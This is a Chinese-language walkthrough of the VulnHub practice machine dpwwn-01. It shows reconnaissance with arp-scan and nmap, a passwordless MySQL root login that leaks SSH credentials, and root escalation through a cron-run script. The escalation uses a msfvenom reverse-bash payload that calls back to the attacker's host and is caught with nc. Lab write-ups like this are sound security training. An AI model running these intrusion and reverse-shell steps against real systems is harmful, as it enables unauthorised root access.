vulnhub靶机-dpwwn-01
知识点:
mysql弱口令
利用root权限定时文件提权
环境准备
靶机下载
下载靶机后解压,打开vmx文件即可,网卡设置为net模式
描述
该boot2root是基于Linux的虚拟机,并已使用VMware工作站14进行了测试。
VM的网络接口将从DHCP(网络模式:NAT)获取IP设置。
目标:获得root特权,并在/ root目录下获取dpwwn-01-FLAG.txt的内容。
注意:已在VMware工作站14上测试。
难度:对初学者来说容易/有帮助。
信息收集
主机发现
1 | arp-scan -l |
得到靶机ip为192.168.211.147
端口扫描nmap -A 192.168.211.147 -p 1-65535
开放了一个22端口、80端口、3306端口
getshell
访问80端口,发现只是一个测试页面,扫描目录页没有太多发现,只发现了一个phpinfo页面
之后尝试从3306端口访问
mysql -h 192.168.211.147 -u root -p
不知道密码,直接回车发现没有密码
之后再ssh库中的users表发现了一个ssh账号密码
使用ssh登陆
ssh mistic@192.168.211.147
输入密码即登陆成功
提权
之后再/home/mistic目录下发现一个logrot.sh文件
猜想是否可以通过该文件来进行提取,首先这个文件需要被root用户所执行
查看定时任务
1 | cat /etc/crontab |
发现该文件会被root用户所执行,满足条件,之后考虑用该文件反弹shell,使用msfvenom在kali里面生成payload:
1 | msfvenom -p cmd/unix/reverse_bash lhost=192.168.211.151 lport=7777 |
之后使用nc监听,执行脚本后即可获得root权限